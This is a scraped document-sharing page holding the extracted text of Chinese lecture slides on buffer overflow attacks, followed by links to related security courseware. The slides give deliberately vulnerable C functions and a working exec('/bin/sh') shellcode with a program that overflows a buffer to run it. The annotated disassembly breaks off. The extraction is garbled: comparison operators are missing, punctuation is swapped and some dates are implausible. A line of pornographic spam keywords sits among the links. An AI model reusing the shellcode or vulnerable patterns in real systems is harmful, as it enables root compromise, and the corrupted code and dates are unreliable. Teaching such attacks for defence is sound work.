正文內(nèi)容

第七章計算機系統(tǒng)安全(緩沖區(qū)溢出)(編輯修改稿)

2025-03-21 23:20 本頁面

　

【文章內(nèi)容簡介】緩沖區(qū)溢出攻擊舉例 ? 1996年 BSDI crontab被發(fā)現(xiàn)存在基于堆的緩沖區(qū)溢出隱患，攻擊者可以通過輸入一個長文件名溢出在堆上的緩沖區(qū)，溢出數(shù)據(jù)改寫的區(qū)域是保存有用戶名、密碼、 uid, gid等信息的區(qū)域。 2023/3/22 緩沖溢出攻擊的原理（續(xù)） ? 2. 緩沖區(qū)溢出可能發(fā)生的位置（續(xù)） ? 堆棧 (stack) ? 堆 (heap) ? 數(shù)據(jù)段 (data) ? BSS段 .text .data .bss heap unused stack env Low address High address Linux/Intel IA32 architecture 2023/3/22 緩沖溢出攻擊的原理（續(xù)） ? 基于數(shù)據(jù)段的緩沖區(qū)溢出 void Overflow_Data(char* input) { static char buf[4]=”CCCC”。 int i。 for (i = 0。 i 12 。 i++) buf[i] = ?A?。 } 2023/3/22 緩沖溢出攻擊的原理（續(xù)） ? 2. 緩沖區(qū)溢出可能發(fā)生的位置（續(xù)） ? 堆棧 (stack) ? 堆 (heap) ? 數(shù)據(jù)段 (data) ? BSS段 .text .data .bss heap unused stack env Low address High address Linux/Intel IA32 architecture 2023/3/22 緩沖溢出攻擊的原理（續(xù)） ? 基于 BSS段的緩沖區(qū)溢出 void Overflow_BSS(char* input) { static char buf[4]。 int i。 for (i = 0。 i 12 。 i++) buf[i] = ?A?。 } 2023/3/22 緩沖溢出攻擊的原理（續(xù)） ? 3. 常見的溢出緩沖區(qū)的途徑 ? 利用 C的標準函數(shù)庫 ? 常見的有 strcpy、 strcat、 sprintf、 gets “Mudge”. How to Write Buffer Overflows. ,1997. Paul A. Henry MCP+I et al. Buffer Overflow Attacks. CyberGuard Corp. C. Cowan et al. Buffer overflows: Attacks and defenses for the vulnerability of the decade. Proceedings of the DARPA Information Survivability Conference and Expo, 1999. 2023/3/22 緩沖溢出攻擊的原理（續(xù)） ? 利用數(shù)組下標的越界操作 ? Offbyone緩沖區(qū)溢出 ? 利用數(shù)組的最大下標與數(shù)組長度的差異產(chǎn)生。例如 ? 1998年 10月 BugTraq公布出 Linux libc中的 realpath函數(shù)存在singlebyte緩沖區(qū)溢出隱患，攻擊者可以利用它獲得 root權(quán)限。參見 O. Kirch. The poisoned nul byte, post to the bugtraq mailing list, October 1998. ? 2023年 12月 OpenBSD安全組公布 ftpd存在類似安全隱患。參見OpenBSD developers, singlebyte buffer overflow vulnerability in ftpd, December 2023. void BadCode(char *str){ char buffer[512]。 for (i=0。i=512。i++) buffer[i]=str[i]。 } 2023/3/22 緩沖溢出攻擊的原理（續(xù)） ? 利用有符號整數(shù)與無符號整數(shù)的轉(zhuǎn)換 void BadCode(char* input) { short len。 char buf[64]。 len = strlen(input)。 if (len MAX_BUF) strcpy(buf, input)。 } 2023/3/22 緩沖溢出攻擊的原理（續(xù)） ? 4. 惡意代碼（注入）例如為實現(xiàn)： “exec (/bin/sh)” char shellcode [ ] = ”\xeb\x1f\x5e\x89\x76\x08\x31\xc0” ”\x88\x46\x07\x89\x46\x0c\xb0\x0b” ”\x89\xf3\x8d\x4e\x08\x8d\x56\x0c” ”\xcd\x80\x31\xdb\x89\xd8\x40\xcd” ”\x80\xe8\xdc\xff\xff\xff / bin / sh”。 char large_string [128]。 void main( ) { char buffer [96]。 int i 。 long * long_ptr 。 long_ptr = (long *) large_string 。 for ( i = 0。 i 32。 i++) *( long_ptr + i ) = ( int ) buffer 。 for ( i =0。 istrlen ( shellcode ) 。 i++) large_string [ i ] = shellcode [ i ] 。 strcpy ( buffer , large_string ) 。 } 2023/3/22 The secret of the shellcode char shellcode [] = /* main: */ \xeb\x1f /* jmp $0x1f or jmp callz */ /* start: */ \x5e /* popl %esi */ \x89\x76\x08 /* movl %esi, $0x08(%esi) */ \x31\xc0 /* xorl %eax, %eax */ \x88\x46\x07 /* movb %al, 0x07(%esi) */ \x89\x46\x0c /* movl %eax, $0x0c(%esi) */ \xb0\x0b /* movb $0x0b, %al */ \x89\xf3 /* movl %es

點擊復(fù)制文檔內(nèi)容

教學(xué)課件相關(guān)推薦

[精選]計算機系統(tǒng)安全與保護講義-資料下載頁

【總結(jié)】吉林化工學(xué)院?第一章網(wǎng)絡(luò)安全概述與環(huán)境配置吉林化工學(xué)院內(nèi)容提要?本章介紹網(wǎng)絡(luò)安全研究的體系?研究網(wǎng)絡(luò)安全的必要性、研究網(wǎng)絡(luò)安全社會意義以及目前?計算機網(wǎng)絡(luò)安全的相關(guān)法規(guī)。?介紹了如何評價一個系統(tǒng)或者應(yīng)用軟件的安全等級。吉林化工學(xué)院網(wǎng)絡(luò)安全的攻防研究體系?網(wǎng)

2025-02-15 16:19

[精選]計算機系統(tǒng)安全與訪問控制-資料下載頁

【總結(jié)】第4章計算機系統(tǒng)安全與訪問控制本章主要內(nèi)容：1．什么是計算機安全2．安全級別3．系統(tǒng)訪問控制4．選擇性訪問控制什么是計算機安全什么是計算機安全主要目標是保護計算機資源免受毀壞、替換、盜竊和丟失。這些計算機資源包括計算機設(shè)備、存儲介質(zhì)、軟件和計算機輸出材料和數(shù)據(jù)。

2025-02-13 20:58

[精選]課程名稱：計算機系統(tǒng)安全-資料下載頁

【總結(jié)】計算機系統(tǒng)安全第二章計算機系統(tǒng)的物理安全一、物理安全概述物理安全:信息系統(tǒng)安全的前提保護計算機設(shè)備、設(shè)施免遭自然災(zāi)害和環(huán)境事故（如電磁污染等）以及人為操作失誤及計算機犯罪行為導(dǎo)致的破壞。例：2023年2月9日中美之間的海底光纜被阻斷的影響。人為的對物理安全的威脅包括：偷竊

2025-02-24 22:16

[精選]計算機系統(tǒng)安全--防火墻-資料下載頁

【總結(jié)】計算機系統(tǒng)安全第九章防火墻1一、防火墻概述什么是防火墻(Firewall)？防火墻：在兩個信任程度不同的網(wǎng)絡(luò)之間設(shè)置的、用于加強訪問控制的軟硬件保護設(shè)施。2一、防火墻的用途一、防火墻概述1）作為“扼制點”，限制信息的進入或離開；2）防止侵入者接近并破壞你的內(nèi)部設(shè)施；

2025-02-15 16:15

[精選]計算機系統(tǒng)安全評價標準-資料下載頁

【總結(jié)】第14章?安全評價標準主要內(nèi)容?v可信計算機系統(tǒng)評價標準v通用評估準則CCv我國信息系統(tǒng)安全評價標準v計算機系統(tǒng)的提供者需要對他們的產(chǎn)品的安全特性進行說明，而用戶則需要驗證這些安全特性的可靠性。v國際上有多種為計算機安全系統(tǒng)構(gòu)筑獨立審查措施的安全評價體系,其內(nèi)容和發(fā)展深刻地反映了對信息安全問題的認識程度。?可

2025-02-13 20:59

計算機系統(tǒng)安全及應(yīng)用安全-資料下載頁

【總結(jié)】1計算機系統(tǒng)安全及應(yīng)用安全2一、操作系統(tǒng)安全的概念我們的學(xué)術(shù)觀點：硬件結(jié)構(gòu)的安全和操作系統(tǒng)的安全是信息系統(tǒng)安全的基礎(chǔ)，密碼、網(wǎng)絡(luò)安全等是關(guān)鍵技術(shù)。3一、操作系統(tǒng)安全的概念1、操作系統(tǒng)是信息系統(tǒng)安全的基礎(chǔ)之一：①操作系統(tǒng)是軟件系統(tǒng)的底層；②操作系統(tǒng)是

2025-01-14 23:01

第4章計算機系統(tǒng)安全與訪問控制-資料下載頁

【總結(jié)】2022年8月17日10時52分計算機網(wǎng)絡(luò)安全基礎(chǔ)第4章計算機系統(tǒng)安全與訪問控制計算機作為一種信息社會中不可缺少的資源和財產(chǎn)以予保護，以防止由于竊賊、侵入者和其它的各種原因造成的損失一直是一個真正的需求。如何保護好計算機系統(tǒng)、設(shè)備以及數(shù)據(jù)的安全是一種頗為刺激的挑戰(zhàn)。由于計算機和信息產(chǎn)業(yè)的快速成長以及對網(wǎng)絡(luò)和全球通信的日益重視

2024-07-29 11:27

計算機系統(tǒng)安全防火墻-資料下載頁

【總結(jié)】1計算機系統(tǒng)安全第九章防火墻2一、防火墻概述什么是防火墻(Firewall)？防火墻：在兩個信任程度不同的網(wǎng)絡(luò)之間設(shè)置的、用于加強訪問控制的軟硬件保護設(shè)施。3一、防火墻的用途一、防火墻概述1）作為“扼制點”，限制信息的進入或離開；2）防止侵入者接近并破壞你的內(nèi)部設(shè)施

2025-01-06 12:10

[精選]計算機系統(tǒng)安全保密工作要點-資料下載頁

【總結(jié)】增強領(lǐng)導(dǎo)干部保密意識1/28/20231二○○七年春季主體班教學(xué)前言國際政治、世界經(jīng)濟格局不斷變化和科學(xué)技術(shù)的迅猛發(fā)展，給保密工作帶來許多新問題，也提出了更新更高的要求。我們要保持清醒的頭腦，以積極的態(tài)度、全新的思路、開拓的精神，創(chuàng)新性

2025-02-15 16:15

計算機系統(tǒng)安全與社會責(zé)任-資料下載頁

【總結(jié)】第12章計算機系統(tǒng)安全與社會責(zé)任【學(xué)習(xí)目標】?理解計算機系統(tǒng)安全的基本概念?掌握計算機病毒基本知識及反病毒技術(shù)?掌握網(wǎng)絡(luò)安全防范措施的基本原理?了解網(wǎng)絡(luò)道德及相關(guān)法規(guī)【能力考查要求】?掌握常用殺毒軟件的下載、安裝及使用方法?掌握防火墻的功能及安裝、使用方法?掌握個人上網(wǎng)時常用的安全防范方

2025-01-09 23:06

計算機系統(tǒng)安全第10章常用攻擊手段-資料下載頁

【總結(jié)】1計算機系統(tǒng)安全第10章常用攻擊手段21、攻擊的位置一、攻擊的一些基本概念（1）遠程攻擊：從該子網(wǎng)以外的地方向該子網(wǎng)或者該子網(wǎng)內(nèi)的系統(tǒng)發(fā)動攻擊。（2）本地攻擊：通過所在的局域網(wǎng)，向本單位的其他系統(tǒng)發(fā)動攻擊，在本機上進行非法越權(quán)訪問也是本地攻擊。（3）偽遠程攻擊：指內(nèi)

2024-08-10 14:04

計算機控制系統(tǒng)第七章-資料下載頁

【總結(jié)】1?線性系統(tǒng)的狀態(tài)空間描述及線性離散系統(tǒng)狀態(tài)空間?線性定常離散系統(tǒng)的能控性和能觀性?狀態(tài)反饋設(shè)計法?輸出反饋設(shè)計法?狀態(tài)觀測器設(shè)計?應(yīng)用狀態(tài)觀測器的狀態(tài)反饋系統(tǒng)?二次型最優(yōu)控制算法設(shè)計2?線性系統(tǒng)的狀態(tài)空間描述?狀態(tài)和狀態(tài)變量?狀態(tài)向量?狀態(tài)空間

2025-05-02 03:44

緩沖區(qū)溢出攻擊的分析及防范策略-資料下載頁

【總結(jié)】緩沖區(qū)溢出攻擊的分析及防范策略摘要隨著Inter及相關(guān)信息技術(shù)的迅速發(fā)展，網(wǎng)上的電子商務(wù)呈現(xiàn)出極大的增長勢頭，但是投入的增多意味著風(fēng)險也隨之而來，網(wǎng)絡(luò)安全問題成為各種網(wǎng)上活動需要考慮的頭等大事。本文重點探討一下緩沖區(qū)溢出對計算機系統(tǒng)造成的危害。因為幾十年來，緩沖區(qū)溢出一直引起許多嚴重的安全性問題。近年由CERT/CC(ComputerEmergency

2024-09-04 08:48

freepeople性欧美熟妇, 色戒完整版无删减158分钟hd, 无码精品国产vα在线观看DVD, 丰满少妇伦精品无码专区在线观看,艾栗栗与纹身男宾馆3p50分钟,国产AV片在线观看,黑人与美女高潮,18岁女RAPPERDISSSUBS,国产手机在机看影片

第七章計算機系統(tǒng)安全(緩沖區(qū)溢出)(編輯修改稿)

[精選]計算機系統(tǒng)安全與保護講義-資料下載頁

[精選]計算機系統(tǒng)安全與訪問控制-資料下載頁

[精選]課程名稱：計算機系統(tǒng)安全-資料下載頁

[精選]計算機系統(tǒng)安全--防火墻-資料下載頁

[精選]計算機系統(tǒng)安全評價標準-資料下載頁

計算機系統(tǒng)安全及應(yīng)用安全-資料下載頁

第4章計算機系統(tǒng)安全與訪問控制-資料下載頁

計算機系統(tǒng)安全防火墻-資料下載頁

[精選]計算機系統(tǒng)安全保密工作要點-資料下載頁

計算機系統(tǒng)安全與社會責(zé)任-資料下載頁

計算機系統(tǒng)安全第10章常用攻擊手段-資料下載頁

計算機控制系統(tǒng)第七章-資料下載頁

緩沖區(qū)溢出攻擊的分析及防范策略-資料下載頁

計算機文化基礎(chǔ)教程-第七章計算機網(wǎng)絡(luò)與安全-資料下載頁

[精選]計算機系統(tǒng)安全及維護第一章課件-資料下載頁

第七章計算機系統(tǒng)安全(緩沖區(qū)溢出)-閱讀頁

第七章計算機系統(tǒng)安全(緩沖區(qū)溢出)(文件)

第七章計算機系統(tǒng)安全(緩沖區(qū)溢出)-全文預(yù)覽

第七章計算機系統(tǒng)安全(緩沖區(qū)溢出)-預(yù)覽頁

第七章計算機系統(tǒng)安全(緩沖區(qū)溢出)-免費閱讀